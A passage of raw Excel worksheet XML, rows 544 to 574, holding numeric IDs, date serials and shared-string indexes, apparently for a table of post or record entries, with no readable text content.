      <c r="G544" s="10">
        <v>41513.647222222222</v>
      </c>
      <c r="H544" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I544" s="9" t="s">
        <v>3358</v>
      </c>
      <c r="J544" s="10">
        <v>41513.552083333336</v>
      </c>
      <c r="K544" s="3" t="s">
        <v>333</v>
      </c>
      <c r="L544" s="4">
        <v>4</v>
      </c>
      <c r="M544" s="4">
        <v>2</v>
      </c>
      <c r="N544" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O544" s="3" t="s">
        <v>701</v>
      </c>
      <c r="P544" s="3"/>
      <c r="Q544" s="3"/>
    </row>
    <row r="545" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A545" s="3">
        <v>275875</v>
      </c>
      <c r="B545" s="3" t="s">
        <v>426</v>
      </c>
      <c r="C545" s="9" t="s">
        <v>3359</v>
      </c>
      <c r="D545" s="9" t="s">
        <v>3360</v>
      </c>
      <c r="E545" s="9">
        <v>28532</v>
      </c>
      <c r="F545" s="9" t="s">
        <v>3361</v>
      </c>
      <c r="G545" s="10">
        <v>39761.597222222219</v>
      </c>
      <c r="H545" s="9">
        <v>1412</v>
      </c>
      <c r="I545" s="9" t="s">
        <v>2436</v>
      </c>
      <c r="J545" s="10">
        <v>39761.57916666667</v>
      </c>
      <c r="K545" s="3" t="s">
        <v>427</v>
      </c>
      <c r="L545" s="4">
        <v>3</v>
      </c>
      <c r="M545" s="4">
        <v>1</v>
      </c>
      <c r="N545" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O545" s="3" t="s">
        <v>706</v>
      </c>
      <c r="P545" s="3"/>
      <c r="Q545" s="3"/>
    </row>
    <row r="546" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A546" s="3">
        <v>276141</v>
      </c>
      <c r="B546" s="3" t="s">
        <v>428</v>
      </c>
      <c r="C546" s="9" t="s">
        <v>3362</v>
      </c>
      <c r="D546" s="9" t="s">
        <v>3363</v>
      </c>
      <c r="E546" s="9">
        <v>14065</v>
      </c>
      <c r="F546" s="9" t="s">
        <v>2554</v>
      </c>
      <c r="G546" s="10">
        <v>42786.973611111112</v>
      </c>
      <c r="H546" s="9">
        <v>7734</v>
      </c>
      <c r="I546" s="9" t="s">
        <v>3364</v>
      </c>
      <c r="J546" s="10">
        <v>42786.780555555553</v>
      </c>
      <c r="K546" s="3" t="s">
        <v>429</v>
      </c>
      <c r="L546" s="4">
        <v>4</v>
      </c>
      <c r="M546" s="4">
        <v>2</v>
      </c>
      <c r="N546" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O546" s="3"/>
      <c r="P546" s="3" t="s">
        <v>710</v>
      </c>
      <c r="Q546" s="3"/>
    </row>
    <row r="547" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A547" s="9">
        <v>276382</v>
      </c>
      <c r="B547" s="9" t="s">
        <v>1346</v>
      </c>
      <c r="C547" s="9" t="s">
        <v>3365</v>
      </c>
      <c r="D547" s="9" t="s">
        <v>3366</v>
      </c>
      <c r="E547" s="9">
        <v>1043</v>
      </c>
      <c r="F547" s="9" t="s">
        <v>1755</v>
      </c>
      <c r="G547" s="10">
        <v>39867.993055555555</v>
      </c>
      <c r="H547" s="9">
        <v>5640</v>
      </c>
      <c r="I547" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="J547" s="10">
        <v>39867.989583333336</v>
      </c>
      <c r="K547" s="9" t="s">
        <v>1347</v>
      </c>
      <c r="L547" s="7">
        <v>3</v>
      </c>
      <c r="M547" s="7">
        <v>1</v>
      </c>
      <c r="Q547" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="548" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A548" s="9">
        <v>276512</v>
      </c>
      <c r="B548" s="12" t="s">
        <v>1348</v>
      </c>
      <c r="C548" s="9" t="s">
        <v>3367</v>
      </c>
      <c r="D548" s="9" t="s">
        <v>3368</v>
      </c>
      <c r="E548" s="9">
        <v>16587</v>
      </c>
      <c r="F548" s="9" t="s">
        <v>1733</v>
      </c>
      <c r="G548" s="10">
        <v>39902.625694444447</v>
      </c>
      <c r="H548" s="9">
        <v>26004</v>
      </c>
      <c r="I548" s="9" t="s">
        <v>2888</v>
      </c>
      <c r="J548" s="10">
        <v>39902.35</v>
      </c>
      <c r="K548" s="9" t="s">
        <v>1349</v>
      </c>
      <c r="L548" s="7">
        <v>15</v>
      </c>
      <c r="M548" s="7">
        <v>13</v>
      </c>
      <c r="N548" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="549" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A549" s="9">
        <v>276706</v>
      </c>
      <c r="B549" s="9" t="s">
        <v>1350</v>
      </c>
      <c r="C549" s="9" t="s">
        <v>3369</v>
      </c>
      <c r="D549" s="9" t="s">
        <v>3370</v>
      </c>
      <c r="E549" s="9">
        <v>229044</v>
      </c>
      <c r="F549" s="9" t="s">
        <v>3371</v>
      </c>
      <c r="G549" s="10">
        <v>42472.646527777775</v>
      </c>
      <c r="H549" s="9">
        <v>3902339</v>
      </c>
      <c r="I549" s="9" t="s">
        <v>3372</v>
      </c>
      <c r="J549" s="10">
        <v>42472.509027777778</v>
      </c>
      <c r="K549" s="9" t="s">
        <v>1351</v>
      </c>
      <c r="L549" s="7">
        <v>8</v>
      </c>
      <c r="M549" s="7">
        <v>6</v>
      </c>
      <c r="N549" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="550" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A550" s="3">
        <v>276951</v>
      </c>
      <c r="B550" s="3" t="s">
        <v>430</v>
      </c>
      <c r="C550" s="9" t="s">
        <v>3373</v>
      </c>
      <c r="D550" s="9" t="s">
        <v>3374</v>
      </c>
      <c r="E550" s="9">
        <v>426671</v>
      </c>
      <c r="F550" s="9" t="s">
        <v>2170</v>
      </c>
      <c r="G550" s="10">
        <v>41932.427083333336</v>
      </c>
      <c r="H550" s="9">
        <v>3172092</v>
      </c>
      <c r="I550" s="9" t="s">
        <v>3375</v>
      </c>
      <c r="J550" s="10">
        <v>41932.361805555556</v>
      </c>
      <c r="K550" s="3" t="s">
        <v>431</v>
      </c>
      <c r="L550" s="4">
        <v>4</v>
      </c>
      <c r="M550" s="4">
        <v>2</v>
      </c>
      <c r="N550" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O550" s="3"/>
      <c r="P550" s="3"/>
      <c r="Q550" s="3"/>
    </row>
    <row r="551" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A551" s="9">
        <v>279170</v>
      </c>
      <c r="B551" s="9" t="s">
        <v>1352</v>
      </c>
      <c r="C551" s="9" t="s">
        <v>3376</v>
      </c>
      <c r="D551" s="9" t="s">
        <v>3377</v>
      </c>
      <c r="E551" s="9">
        <v>508666</v>
      </c>
      <c r="F551" s="9" t="s">
        <v>3378</v>
      </c>
      <c r="G551" s="10">
        <v>42641.779166666667</v>
      </c>
      <c r="H551" s="9">
        <v>4802649</v>
      </c>
      <c r="I551" s="9" t="s">
        <v>3379</v>
      </c>
      <c r="J551" s="10">
        <v>42641.643750000003</v>
      </c>
      <c r="K551" s="9" t="s">
        <v>1353</v>
      </c>
      <c r="L551" s="7">
        <v>11</v>
      </c>
      <c r="M551" s="7">
        <v>9</v>
      </c>
      <c r="N551" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="552" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A552" s="3">
        <v>279338</v>
      </c>
      <c r="B552" s="3" t="s">
        <v>432</v>
      </c>
      <c r="C552" s="9" t="s">
        <v>3380</v>
      </c>
      <c r="D552" s="9" t="s">
        <v>3381</v>
      </c>
      <c r="E552" s="9">
        <v>4279</v>
      </c>
      <c r="F552" s="9" t="s">
        <v>1805</v>
      </c>
      <c r="G552" s="10">
        <v>39762.981249999997</v>
      </c>
      <c r="H552" s="9">
        <v>4279</v>
      </c>
      <c r="I552" s="9" t="s">
        <v>1805</v>
      </c>
      <c r="J552" s="10">
        <v>39762.970138888886</v>
      </c>
      <c r="K552" s="3" t="s">
        <v>433</v>
      </c>
      <c r="L552" s="4">
        <v>4</v>
      </c>
      <c r="M552" s="4">
        <v>1</v>
      </c>
      <c r="N552" s="3"/>
      <c r="O552" s="3"/>
      <c r="P552" s="3" t="s">
        <v>710</v>
      </c>
      <c r="Q552" s="3"/>
    </row>
    <row r="553" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A553" s="9">
        <v>279534</v>
      </c>
      <c r="B553" s="9" t="s">
        <v>1354</v>
      </c>
      <c r="C553" s="9" t="s">
        <v>3382</v>
      </c>
      <c r="D553" s="9" t="s">
        <v>3383</v>
      </c>
      <c r="E553" s="9">
        <v>12971</v>
      </c>
      <c r="F553" s="9" t="s">
        <v>3061</v>
      </c>
      <c r="G553" s="10">
        <v>40287.146527777775</v>
      </c>
      <c r="H553" s="9">
        <v>75500</v>
      </c>
      <c r="I553" s="9" t="s">
        <v>2443</v>
      </c>
      <c r="J553" s="10">
        <v>40287.143750000003</v>
      </c>
      <c r="K553" s="9" t="s">
        <v>1355</v>
      </c>
      <c r="L553" s="7">
        <v>5</v>
      </c>
      <c r="M553" s="7">
        <v>3</v>
      </c>
      <c r="N553" s="9" t="s">
        <v>701</v>
      </c>
      <c r="O553" s="9" t="s">
        <v>702</v>
      </c>
    </row>
    <row r="554" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A554" s="3">
        <v>279537</v>
      </c>
      <c r="B554" s="3" t="s">
        <v>434</v>
      </c>
      <c r="C554" s="9" t="s">
        <v>3384</v>
      </c>
      <c r="D554" s="9" t="s">
        <v>3385</v>
      </c>
      <c r="E554" s="9">
        <v>34218</v>
      </c>
      <c r="F554" s="9" t="s">
        <v>3386</v>
      </c>
      <c r="G554" s="10">
        <v>39763.084722222222</v>
      </c>
      <c r="H554" s="9">
        <v>12943</v>
      </c>
      <c r="I554" s="9" t="s">
        <v>3387</v>
      </c>
      <c r="J554" s="10">
        <v>39763.021527777775</v>
      </c>
      <c r="K554" s="3" t="s">
        <v>435</v>
      </c>
      <c r="L554" s="4">
        <v>3</v>
      </c>
      <c r="M554" s="4">
        <v>1</v>
      </c>
      <c r="N554" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O554" s="3"/>
      <c r="P554" s="3"/>
      <c r="Q554" s="3"/>
    </row>
    <row r="555" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A555" s="9">
        <v>279966</v>
      </c>
      <c r="B555" s="9" t="s">
        <v>1356</v>
      </c>
      <c r="C555" s="9" t="s">
        <v>3388</v>
      </c>
      <c r="D555" s="9" t="s">
        <v>3389</v>
      </c>
      <c r="E555" s="9">
        <v>27580</v>
      </c>
      <c r="F555" s="9" t="s">
        <v>3390</v>
      </c>
      <c r="G555" s="10">
        <v>40646.76458333333</v>
      </c>
      <c r="H555" s="9">
        <v>9314</v>
      </c>
      <c r="I555" s="9" t="s">
        <v>1698</v>
      </c>
      <c r="J555" s="10">
        <v>40638.125694444447</v>
      </c>
      <c r="K555" s="9" t="s">
        <v>1357</v>
      </c>
      <c r="L555" s="7">
        <v>4</v>
      </c>
      <c r="M555" s="7">
        <v>1</v>
      </c>
      <c r="N555" s="9" t="s">
        <v>699</v>
      </c>
      <c r="Q555" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="556" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A556" s="3">
        <v>280121</v>
      </c>
      <c r="B556" s="3" t="s">
        <v>452</v>
      </c>
      <c r="C556" s="9" t="s">
        <v>3391</v>
      </c>
      <c r="D556" s="9" t="s">
        <v>3392</v>
      </c>
      <c r="E556" s="9">
        <v>3415</v>
      </c>
      <c r="F556" s="9" t="s">
        <v>3393</v>
      </c>
      <c r="G556" s="10">
        <v>40694.540277777778</v>
      </c>
      <c r="H556" s="9">
        <v>142162</v>
      </c>
      <c r="I556" s="9" t="s">
        <v>3394</v>
      </c>
      <c r="J556" s="10">
        <v>40692.765277777777</v>
      </c>
      <c r="K556" s="3" t="s">
        <v>453</v>
      </c>
      <c r="L556" s="4">
        <v>3</v>
      </c>
      <c r="M556" s="4">
        <v>1</v>
      </c>
      <c r="N556" s="3"/>
      <c r="O556" s="3"/>
      <c r="P556" s="3"/>
      <c r="Q556" s="3" t="s">
        <v>712</v>
      </c>
    </row>
    <row r="557" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A557" s="3">
        <v>280396</v>
      </c>
      <c r="B557" s="3" t="s">
        <v>520</v>
      </c>
      <c r="C557" s="9" t="s">
        <v>3395</v>
      </c>
      <c r="D557" s="9" t="s">
        <v>3396</v>
      </c>
      <c r="E557" s="9">
        <v>893</v>
      </c>
      <c r="F557" s="9" t="s">
        <v>2109</v>
      </c>
      <c r="G557" s="10">
        <v>42718.705555555556</v>
      </c>
      <c r="H557" s="9">
        <v>992165</v>
      </c>
      <c r="I557" s="9" t="s">
        <v>3397</v>
      </c>
      <c r="J557" s="10">
        <v>42718.569444444445</v>
      </c>
      <c r="K557" s="3" t="s">
        <v>521</v>
      </c>
      <c r="L557" s="4">
        <v>4</v>
      </c>
      <c r="M557" s="4">
        <v>2</v>
      </c>
      <c r="N557" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O557" s="3"/>
      <c r="P557" s="3"/>
      <c r="Q557" s="3"/>
    </row>
    <row r="558" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A558" s="3">
        <v>280956</v>
      </c>
      <c r="B558" s="3" t="s">
        <v>522</v>
      </c>
      <c r="C558" s="9" t="s">
        <v>3398</v>
      </c>
      <c r="D558" s="9" t="s">
        <v>3399</v>
      </c>
      <c r="E558" s="9">
        <v>3043</v>
      </c>
      <c r="F558" s="9" t="s">
        <v>813</v>
      </c>
      <c r="G558" s="10">
        <v>41241.609722222223</v>
      </c>
      <c r="H558" s="9">
        <v>3043</v>
      </c>
      <c r="I558" s="9" t="s">
        <v>813</v>
      </c>
      <c r="J558" s="10">
        <v>41241.609027777777</v>
      </c>
      <c r="K558" s="3" t="s">
        <v>523</v>
      </c>
      <c r="L558" s="4">
        <v>3</v>
      </c>
      <c r="M558" s="4">
        <v>1</v>
      </c>
      <c r="N558" s="3" t="s">
        <v>706</v>
      </c>
      <c r="O558" s="3" t="s">
        <v>700</v>
      </c>
      <c r="P558" s="3"/>
      <c r="Q558" s="3"/>
    </row>
    <row r="559" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A559" s="3">
        <v>281294</v>
      </c>
      <c r="B559" s="5" t="s">
        <v>524</v>
      </c>
      <c r="C559" s="9" t="s">
        <v>3400</v>
      </c>
      <c r="D559" s="9" t="s">
        <v>3401</v>
      </c>
      <c r="E559" s="9">
        <v>9493</v>
      </c>
      <c r="F559" s="9" t="s">
        <v>3402</v>
      </c>
      <c r="G559" s="10">
        <v>39766.551388888889</v>
      </c>
      <c r="H559" s="9">
        <v>9493</v>
      </c>
      <c r="I559" s="9" t="s">
        <v>3402</v>
      </c>
      <c r="J559" s="10">
        <v>39763.686805555553</v>
      </c>
      <c r="K559" s="3" t="s">
        <v>525</v>
      </c>
      <c r="L559" s="4">
        <v>3</v>
      </c>
      <c r="M559" s="4">
        <v>1</v>
      </c>
      <c r="N559" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O559" s="3" t="s">
        <v>706</v>
      </c>
      <c r="P559" s="3"/>
      <c r="Q559" s="3"/>
    </row>
    <row r="560" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A560" s="9">
        <v>281383</v>
      </c>
      <c r="B560" s="9" t="s">
        <v>1358</v>
      </c>
      <c r="C560" s="9" t="s">
        <v>3403</v>
      </c>
      <c r="D560" s="9" t="s">
        <v>3404</v>
      </c>
      <c r="E560" s="9">
        <v>35454</v>
      </c>
      <c r="F560" s="9" t="s">
        <v>3405</v>
      </c>
      <c r="G560" s="10">
        <v>39763.688888888886</v>
      </c>
      <c r="H560" s="9">
        <v>35454</v>
      </c>
      <c r="I560" s="9" t="s">
        <v>3405</v>
      </c>
      <c r="J560" s="10">
        <v>39763.685416666667</v>
      </c>
      <c r="K560" s="9" t="s">
        <v>1359</v>
      </c>
      <c r="L560" s="7">
        <v>2</v>
      </c>
      <c r="M560" s="7">
        <v>1</v>
      </c>
      <c r="N560" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="561" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A561" s="9">
        <v>281909</v>
      </c>
      <c r="B561" s="9" t="s">
        <v>1360</v>
      </c>
      <c r="C561" s="9" t="s">
        <v>3406</v>
      </c>
      <c r="D561" s="9" t="s">
        <v>3407</v>
      </c>
      <c r="E561" s="9">
        <v>1965</v>
      </c>
      <c r="F561" s="9" t="s">
        <v>2620</v>
      </c>
      <c r="G561" s="10">
        <v>39763.815972222219</v>
      </c>
      <c r="H561" s="9">
        <v>3043</v>
      </c>
      <c r="I561" s="9" t="s">
        <v>813</v>
      </c>
      <c r="J561" s="10">
        <v>39763.81527777778</v>
      </c>
      <c r="K561" s="9" t="s">
        <v>1361</v>
      </c>
      <c r="L561" s="7">
        <v>4</v>
      </c>
      <c r="M561" s="7">
        <v>2</v>
      </c>
      <c r="N561" s="9" t="s">
        <v>702</v>
      </c>
    </row>
    <row r="562" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A562" s="9">
        <v>282023</v>
      </c>
      <c r="B562" s="9" t="s">
        <v>1362</v>
      </c>
      <c r="C562" s="9" t="s">
        <v>3408</v>
      </c>
      <c r="D562" s="9" t="s">
        <v>3409</v>
      </c>
      <c r="E562" s="9">
        <v>4893</v>
      </c>
      <c r="F562" s="9" t="s">
        <v>3321</v>
      </c>
      <c r="G562" s="10">
        <v>39763.856249999997</v>
      </c>
      <c r="H562" s="9">
        <v>36670</v>
      </c>
      <c r="I562" s="9" t="s">
        <v>3410</v>
      </c>
      <c r="J562" s="10">
        <v>39763.852083333331</v>
      </c>
      <c r="K562" s="9" t="s">
        <v>1363</v>
      </c>
      <c r="L562" s="7">
        <v>4</v>
      </c>
      <c r="M562" s="7">
        <v>2</v>
      </c>
      <c r="N562" s="9" t="s">
        <v>702</v>
      </c>
    </row>
    <row r="563" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A563" s="3">
        <v>282083</v>
      </c>
      <c r="B563" s="3" t="s">
        <v>526</v>
      </c>
      <c r="C563" s="9" t="s">
        <v>3411</v>
      </c>
      <c r="D563" s="9" t="s">
        <v>3412</v>
      </c>
      <c r="E563" s="9">
        <v>4200</v>
      </c>
      <c r="F563" s="9" t="s">
        <v>2052</v>
      </c>
      <c r="G563" s="10">
        <v>39763.873611111114</v>
      </c>
      <c r="H563" s="9">
        <v>4200</v>
      </c>
      <c r="I563" s="9" t="s">
        <v>2052</v>
      </c>
      <c r="J563" s="10">
        <v>39763.87222222222</v>
      </c>
      <c r="K563" s="3" t="s">
        <v>527</v>
      </c>
      <c r="L563" s="4">
        <v>3</v>
      </c>
      <c r="M563" s="4">
        <v>1</v>
      </c>
      <c r="N563" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O563" s="3"/>
      <c r="P563" s="3"/>
      <c r="Q563" s="3"/>
    </row>
    <row r="564" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A564" s="9">
        <v>282267</v>
      </c>
      <c r="B564" s="9" t="s">
        <v>1364</v>
      </c>
      <c r="C564" s="9" t="s">
        <v>3413</v>
      </c>
      <c r="D564" s="9" t="s">
        <v>3414</v>
      </c>
      <c r="E564" s="9">
        <v>27580</v>
      </c>
      <c r="F564" s="9" t="s">
        <v>3390</v>
      </c>
      <c r="G564" s="10">
        <v>42547.869444444441</v>
      </c>
      <c r="H564" s="9">
        <v>502381</v>
      </c>
      <c r="I564" s="9" t="s">
        <v>3415</v>
      </c>
      <c r="J564" s="10">
        <v>42147.724999999999</v>
      </c>
      <c r="K564" s="9" t="s">
        <v>1365</v>
      </c>
      <c r="L564" s="7">
        <v>8</v>
      </c>
      <c r="M564" s="7">
        <v>6</v>
      </c>
      <c r="N564" s="9" t="s">
        <v>697</v>
      </c>
      <c r="Q564" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="565" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A565" s="3">
        <v>282495</v>
      </c>
      <c r="B565" s="3" t="s">
        <v>528</v>
      </c>
      <c r="C565" s="9" t="s">
        <v>3416</v>
      </c>
      <c r="D565" s="9" t="s">
        <v>3417</v>
      </c>
      <c r="E565" s="9">
        <v>13103</v>
      </c>
      <c r="F565" s="9" t="s">
        <v>3418</v>
      </c>
      <c r="G565" s="10">
        <v>43159.647222222222</v>
      </c>
      <c r="H565" s="9">
        <v>3551590</v>
      </c>
      <c r="I565" s="9" t="s">
        <v>3419</v>
      </c>
      <c r="J565" s="10">
        <v>43158.45</v>
      </c>
      <c r="K565" s="3" t="s">
        <v>529</v>
      </c>
      <c r="L565" s="4">
        <v>4</v>
      </c>
      <c r="M565" s="4">
        <v>2</v>
      </c>
      <c r="N565" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O565" s="3" t="s">
        <v>704</v>
      </c>
      <c r="P565" s="3"/>
      <c r="Q565" s="3"/>
    </row>
    <row r="566" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A566" s="9">
        <v>282600</v>
      </c>
      <c r="B566" s="9" t="s">
        <v>1366</v>
      </c>
      <c r="C566" s="9" t="s">
        <v>3420</v>
      </c>
      <c r="D566" s="9" t="s">
        <v>3421</v>
      </c>
      <c r="E566" s="9">
        <v>4234</v>
      </c>
      <c r="F566" s="9" t="s">
        <v>3422</v>
      </c>
      <c r="G566" s="10">
        <v>39764.034722222219</v>
      </c>
      <c r="H566" s="9">
        <v>14167</v>
      </c>
      <c r="I566" s="9" t="s">
        <v>3423</v>
      </c>
      <c r="J566" s="10">
        <v>39764.025694444441</v>
      </c>
      <c r="K566" s="9" t="s">
        <v>1367</v>
      </c>
      <c r="L566" s="7">
        <v>4</v>
      </c>
      <c r="M566" s="7">
        <v>2</v>
      </c>
      <c r="N566" s="9" t="s">
        <v>701</v>
      </c>
      <c r="Q566" s="9" t="s">
        <v>978</v>
      </c>
    </row>
    <row r="567" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A567" s="9">
        <v>282670</v>
      </c>
      <c r="B567" s="9" t="s">
        <v>1368</v>
      </c>
      <c r="C567" s="9" t="s">
        <v>3424</v>
      </c>
      <c r="D567" s="9" t="s">
        <v>3425</v>
      </c>
      <c r="E567" s="9">
        <v>10936</v>
      </c>
      <c r="F567" s="9" t="s">
        <v>2173</v>
      </c>
      <c r="G567" s="10">
        <v>40706.293749999997</v>
      </c>
      <c r="H567" s="9">
        <v>-1</v>
      </c>
      <c r="I567" s="9" t="s">
        <v>2025</v>
      </c>
      <c r="J567" s="10">
        <v>40706.289583333331</v>
      </c>
      <c r="K567" s="9" t="s">
        <v>1369</v>
      </c>
      <c r="L567" s="7">
        <v>3</v>
      </c>
      <c r="M567" s="7">
        <v>1</v>
      </c>
      <c r="N567" s="3" t="s">
        <v>697</v>
      </c>
      <c r="Q567" s="9" t="s">
        <v>1047</v>
      </c>
    </row>
    <row r="568" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A568" s="9">
        <v>283378</v>
      </c>
      <c r="B568" s="9" t="s">
        <v>1370</v>
      </c>
      <c r="C568" s="9" t="s">
        <v>3426</v>
      </c>
      <c r="D568" s="9" t="s">
        <v>3427</v>
      </c>
      <c r="E568" s="9">
        <v>32826</v>
      </c>
      <c r="F568" s="9" t="s">
        <v>3428</v>
      </c>
      <c r="G568" s="10">
        <v>41330.912499999999</v>
      </c>
      <c r="H568" s="9">
        <v>23199</v>
      </c>
      <c r="I568" s="9" t="s">
        <v>3429</v>
      </c>
      <c r="J568" s="10">
        <v>41281.905555555553</v>
      </c>
      <c r="K568" s="9" t="s">
        <v>1371</v>
      </c>
      <c r="L568" s="7">
        <v>3</v>
      </c>
      <c r="M568" s="7">
        <v>1</v>
      </c>
      <c r="N568" s="9" t="s">
        <v>704</v>
      </c>
      <c r="Q568" s="9" t="s">
        <v>955</v>
      </c>
    </row>
    <row r="569" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A569" s="3">
        <v>283630</v>
      </c>
      <c r="B569" s="3" t="s">
        <v>530</v>
      </c>
      <c r="C569" s="9" t="s">
        <v>3430</v>
      </c>
      <c r="D569" s="9" t="s">
        <v>3431</v>
      </c>
      <c r="E569" s="9">
        <v>541136</v>
      </c>
      <c r="F569" s="9" t="s">
        <v>3432</v>
      </c>
      <c r="G569" s="10">
        <v>42710.101388888892</v>
      </c>
      <c r="H569" s="9">
        <v>541136</v>
      </c>
      <c r="I569" s="9" t="s">
        <v>3432</v>
      </c>
      <c r="J569" s="10">
        <v>42709.881944444445</v>
      </c>
      <c r="K569" s="3" t="s">
        <v>531</v>
      </c>
      <c r="L569" s="4">
        <v>3</v>
      </c>
      <c r="M569" s="4">
        <v>1</v>
      </c>
      <c r="N569" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O569" s="3"/>
      <c r="P569" s="3"/>
      <c r="Q569" s="3"/>
    </row>
    <row r="570" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A570" s="9">
        <v>283888</v>
      </c>
      <c r="B570" s="9" t="s">
        <v>1372</v>
      </c>
      <c r="C570" s="9" t="s">
        <v>3433</v>
      </c>
      <c r="D570" s="9" t="s">
        <v>3434</v>
      </c>
      <c r="E570" s="9">
        <v>13913</v>
      </c>
      <c r="F570" s="9" t="s">
        <v>2821</v>
      </c>
      <c r="G570" s="10">
        <v>39764.569444444445</v>
      </c>
      <c r="H570" s="9">
        <v>2598</v>
      </c>
      <c r="I570" s="9" t="s">
        <v>2785</v>
      </c>
      <c r="J570" s="10">
        <v>39764.568055555559</v>
      </c>
      <c r="K570" s="9" t="s">
        <v>1373</v>
      </c>
      <c r="L570" s="7">
        <v>3</v>
      </c>
      <c r="M570" s="7">
        <v>1</v>
      </c>
      <c r="N570" s="9" t="s">
        <v>699</v>
      </c>
      <c r="Q570" s="9" t="s">
        <v>1047</v>
      </c>
    </row>
    <row r="571" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A571" s="9">
        <v>284919</v>
      </c>
      <c r="B571" s="9" t="s">
        <v>1374</v>
      </c>
      <c r="C571" s="9" t="s">
        <v>3435</v>
      </c>
      <c r="D571" s="9" t="s">
        <v>3436</v>
      </c>
      <c r="E571" s="9">
        <v>26948</v>
      </c>
      <c r="F571" s="9" t="s">
        <v>3437</v>
      </c>
      <c r="G571" s="10">
        <v>39764.786111111112</v>
      </c>
      <c r="H571" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I571" s="9" t="s">
        <v>3438</v>
      </c>
      <c r="J571" s="10">
        <v>39764.785416666666</v>
      </c>
      <c r="K571" s="9" t="s">
        <v>1375</v>
      </c>
      <c r="L571" s="7">
        <v>3</v>
      </c>
      <c r="M571" s="7">
        <v>1</v>
      </c>
      <c r="N571" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="572" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A572" s="9">
        <v>285015</v>
      </c>
      <c r="B572" s="9" t="s">
        <v>1376</v>
      </c>
      <c r="C572" s="9" t="s">
        <v>3439</v>
      </c>
      <c r="D572" s="9" t="s">
        <v>3440</v>
      </c>
      <c r="E572" s="9">
        <v>25700</v>
      </c>
      <c r="F572" s="9" t="s">
        <v>3441</v>
      </c>
      <c r="G572" s="10">
        <v>42660.629166666666</v>
      </c>
      <c r="H572" s="9">
        <v>3980929</v>
      </c>
      <c r="I572" s="9" t="s">
        <v>3442</v>
      </c>
      <c r="J572" s="10">
        <v>42660.606944444444</v>
      </c>
      <c r="K572" s="9" t="s">
        <v>1377</v>
      </c>
      <c r="L572" s="7">
        <v>4</v>
      </c>
      <c r="M572" s="7">
        <v>2</v>
      </c>
      <c r="N572" s="9" t="s">
        <v>699</v>
      </c>
      <c r="O572" s="9" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="573" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A573" s="3">
        <v>285667</v>
      </c>
      <c r="B573" s="3" t="s">
        <v>580</v>
      </c>
      <c r="C573" s="9" t="s">
        <v>3443</v>
      </c>
      <c r="D573" s="9" t="s">
        <v>3444</v>
      </c>
      <c r="E573" s="9">
        <v>3474</v>
      </c>
      <c r="F573" s="9" t="s">
        <v>1963</v>
      </c>
      <c r="G573" s="10">
        <v>39764.949305555558</v>
      </c>
      <c r="H573" s="9">
        <v>3474</v>
      </c>
      <c r="I573" s="9" t="s">
        <v>1963</v>
      </c>
      <c r="J573" s="10">
        <v>39764.948611111111</v>
      </c>
      <c r="K573" s="3" t="s">
        <v>581</v>
      </c>
      <c r="L573" s="4">
        <v>3</v>
      </c>
      <c r="M573" s="4">
        <v>1</v>
      </c>
      <c r="N573" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O573" s="3"/>
      <c r="P573" s="3"/>
      <c r="Q573" s="3"/>
    </row>
    <row r="574" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A574" s="3">
        <v>286978</v>
      </c>
      <c r="B574" s="3" t="s">
        <v>582</v>
      </c>
      <c r="C574" s="9" t="s">
        <v>3445</v>
      </c>
      <c r="D574" s="9" t="s">
        <v>3446</v>
      </c>
      <c r="E574" s="9">
        <v>13913</v>
      </c>
      <c r="F574" s="9" t="s">
        <v>2821</v>
      </c>
      <c r="G574" s="10">
        <v>39765.604166666664</v>
      </c>
      <c r="H574" s="9">
        <v>29</v>
